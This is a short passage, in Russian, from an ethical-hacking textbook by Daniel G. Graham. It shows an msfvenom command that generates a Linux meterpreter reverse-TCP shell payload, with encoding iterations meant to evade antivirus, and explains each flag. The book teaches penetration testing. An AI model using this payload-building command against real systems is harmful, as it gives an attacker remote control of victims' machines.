kali@kali:~/Desktop/Malware$ sudo msfvenom -a x86 --platform linux -p linux/
➥ x86/meterpreter/reverse_tcp LHOST=<IP-адрес Kali> LPORT=443
➥ --smallest -i 4 -f elf -o malicious
Флаг -a обозначает целевую архитектуру, в данном случае это x86. Флаг --platform указывает целевую платформу, а флаг -p — тип полезной нагрузки, в данном случае это обратная TCP-оболочка, подобная той, которую мы реализовали в главе 4. Флаг --smallest генерирует минимально возможную полезную нагрузку. Флаг -i помогает обходить средства антивирусной защиты, о чем мы поговорим чуть позже. Флаг -f задает тип выходного файла. Мы выбрали формат elf, поскольку он используется исполняемыми файлами ОС Linux. (Формат exe используется исполняемыми файлами ОС Windows.) Флаг -o задает имя выходного файла.
Этичный хакинг. Практическое руководство по взлому
·
Дэниел Г. Грэм